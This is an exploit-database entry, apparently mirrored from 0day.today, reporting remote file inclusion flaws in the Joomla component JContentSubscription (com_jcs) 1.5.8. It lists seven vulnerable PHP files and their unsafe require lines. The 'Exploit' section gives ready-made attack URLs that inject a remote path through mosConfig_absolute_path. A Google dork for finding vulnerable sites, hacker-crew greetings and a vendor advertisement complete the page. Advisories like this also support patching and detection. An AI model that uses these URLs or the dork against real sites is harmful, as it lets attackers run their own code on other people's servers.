Lucene search

Joomla Component JContentSubscription 1.5.8 Multiple RFI Vulns

🗓️ 10 Oct 2007 00:00:00Reported by NoGeType

zdt🔗 0day.today👁 63 Views

Joomla Component JContentSubscription 1.5.8 Multiple RFI Vuln

==============================================================
Joomla Component JContentSubscription 1.5.8 Multiple RFI Vulns 
==============================================================



# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

   Component    : com_jcs version 1.5.8 - payable component
   Dicovered by : NoGe

==================================================================================================================================

# Vulnerable file

   /administrator/components/com_jcs/jcs.function.php

   line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/add.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/history.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/register.php

   line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/views/list.sub.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/list.user.sub.html.php

   line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/reports.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

# Exploit

   http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]

# Google dork

   inurl:com_jcs

==================================================================================================================================

# Greetz

   all crew #papuahacker #baliemhackerlink #nyubicrew
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq

================================================================================================================================== 



#  0day.today [2018-03-03]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

10 Oct 2007 00:00Current

7.1High risk

Vulners AI Score7.1